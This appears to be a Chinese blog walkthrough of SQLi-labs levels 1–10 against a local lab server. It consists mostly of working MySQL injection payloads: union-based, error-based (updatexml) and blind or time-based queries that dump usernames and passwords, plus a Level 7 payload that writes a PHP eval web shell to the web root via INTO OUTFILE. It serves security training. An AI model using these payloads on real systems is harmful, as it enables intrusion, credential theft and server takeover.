注释符:'#' '-- ' '/**/'
#:%23
传输过程对单引号还有空格进行了url编码。原来是#号没了,为什么呢?因为url中的#号代表html页面中的锚点,数据传输过程并不会一起带到后端
在进行写入数据库文件的时候,路径中间为'/' 或者为 '\\'
为什么要使用双斜杠原因为:
由于我们是把路径当成是一个字符串传进去的,在字符串中斜杠“\”被当做转义字符识别,所以要用“\\”才能表示一个斜杠。
1.
字符型
http://127.0.0.1:88/sql/Less-1/?id=1' order by 4%23失败
http://127.0.0.1:88/sql/Less-1/?id=1' order by 3%23成功
http://127.0.0.1:88/sql/Less-1/?id=-1' union select 1,database(),group_concat(schema_name) from information_schema.schemata%23 查看所有数据库
http://127.0.0.1:88/sql/Less-1/?id=-1' union select 1,database(),group_concat(table_name) from information_schema.tables where table_schema='security'%23 查看security数据库下的所有表
http://127.0.0.1:88/sql/Less-1/?id=-1' union select 1,database(),group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'%23 查看表users的所有列
http://127.0.0.1:88/sql/Less-1/?id=-1' union select 1,group_concat(username),group_concat(password) from security.users%23 查看表users的username和password数据
2.
判断整形
http://127.0.0.1:88/sql/Less-2/?id=1 order by 3 %23成功
http://127.0.0.1:88/sql/Less-2/?id=1 order by 4 %23不成功
http://127.0.0.1:88/sql/Less-2/?id=-1 union select 1,database(),group_concat(schema_name) from information_schema.schemata %23 查看所有数据库
http://127.0.0.1:88/sql/Less-2/?id=-1 union select 1,database(),group_concat(table_name) from information_schema.tables where table_schema='security'%23 查看数据库security下所有的表
http://127.0.0.1:88/sql/Less-2/?id=-1 union select 1,database(),group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'%23 查看所有的users表下的列
http://127.0.0.1:88/sql/Less-2/?id=-1 union select 1,group_concat(username),group_concat(password) from security.users%23 查看所有的username,password数据
3.
http://127.0.0.1:88/sql/Less-3/?id=1') %23
http://127.0.0.1:88/sql/Less-3/?id=1') order by 4 %23不成功
http://127.0.0.1:88/sql/Less-3/?id=1') order by 3 %23成功
http://127.0.0.1:88/sql/Less-3/?id=-1') union select 1,database(),group_concat(schema_name) from information_schema.schemata %23
除了前面的闭合,其他的和上面一样
4.
http://127.0.0.1:88/sql/Less-4/?id=1") %23
http://127.0.0.1:88/sql/Less-4/?id=1") order by 4 %23 不成功
http://127.0.0.1:88/sql/Less-4/?id=1") order by 3 %23 成功
除了前面的闭合,其他的和上面一样
5.
加''进行闭合,或者直接' %23对后面进行省略,此外,无数据回显,进行盲注或者报错注入
报错注入:http://127.0.0.1:88/sql/Less-5/?id=1' and 1=(updatexml(1,concat(0x3a,(select group_concat(database()) from information_schema.schemata)),1)); %23 查看所有数据库
http://127.0.0.1:88/sql/Less-5/?id=1' and 1=(updatexml(1,concat(0x3a,(select group_concat(table_name) from information_schema.tables where table_schema='security' )),1)); %23 查看数据库security下所有的表
http://127.0.0.1:88/sql/Less-5/?id=1' and 1=(updatexml(1,concat(0x3a,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),1)); %23 查看所有的users表下的列
http://127.0.0.1:88/sql/Less-5/?id=1' and 1=(updatexml(1,concat(0x3a,(select group_concat(username) from security.users)),1)); %23 查看所有的username数据
http://127.0.0.1:88/sql/Less-5/?id=1' and 1=(updatexml(1,concat(0x3a,(select group_concat(password) from security.users)),1)); %23 查看所有password数据
盲注:
http://127.0.0.1:88/sql/Less-5/?id=1' and length(database())=1 %23 用brup开始跑,最后数据库长度为8
http://127.0.0.1:88/sql/Less-5/?id=1' and ascii(substr(database(),1,1))='0' %23 开始跑brup,最后数据库名ascii为115 101 99 117 114 105 116 121 转换为security
http://127.0.0.1:88/sql/Less-5/?id=1' and (select count(*)from information_schema.tables where table_schema=database() )=4 %23 可以发现当前数据库下有4张表
http://127.0.0.1:88/sql/Less-5/?id=1' and substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1)='0' %23 跑出第一张表为emails,把后面的limit 1,1 一次次换,得到四张表
后来就和上面一样依次跑出表的字段,数据
6.
http://127.0.0.1:88/sql/Less-6/?id=1" %23 和上面的去区别是用双引号进行闭合
其他的步骤和上面类似
7.
http://127.0.0.1:88/sql/Less-7/?id=1')) %23 闭合
http://127.0.0.1:88/sql/Less-7/?id=1')) union select 1,2,3 into outfile "D:\\web\\PhpStudy20180211\\PHPTutorial\\WWW\\a.php"--+ 写入文件
http://127.0.0.1:88/sql/Less-7/?id=1')) union select 1,2,3 into outfile "D:/web/PhpStudy20180211/PHPTutorial/WWW/a.php"--+ 写入文件
http://127.0.0.1:88/sql/Less-7/?id=1')) union select 1,"<?php @eval($_POST['cmd']); ?>",3 into outfile "D:/web/PhpStudy20180211/PHPTutorial/WWW/sql/a.php"--+ 写入一句话
8.
http://127.0.0.1:88/sql/Less-8/?id=1' %23 闭合
和第五个盲注过程一样,通过brup跑
9.
发现无回显,用报错或者时间盲注,但是测试报错注入也不行,只能用时间盲注
http://127.0.0.1:88/sql/Less-9/?id=1' and if(1=2,1,sleep(5)) %23 闭合
http://127.0.0.1:88/sql/Less-9/?id=1' and if(length(database())<1,sleep(10),1) %23 brup跑数字库长度,当到8时暂停了10秒
http://127.0.0.1:88/sql/Less-9/?id=1' and and if(ascii(substring(database(),1,1))='110',sleep(5),1) %23 跑assic码,跑出来是security
http://127.0.0.1:88/sql/Less-9/?id=1' and if((select count(*)from information_schema.tables where table_schema=database() )=4,sleep(5),1) %23 发现当前数据库下有4张表
下来就是和第5关的盲注一样了,只不过加上sleep函数进行判断对错
10.
http://127.0.0.1:88/sql/Less-10/?id=1" and if(1=2,1,sleep(5)) %23 闭合
http://127.0.0.1:88/sql/Less-10/?id=1" and if(length(database())<9,sleep(10),1) %23 判断出当前数据库名称为8位
下来就和第九关差不多了
2787
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
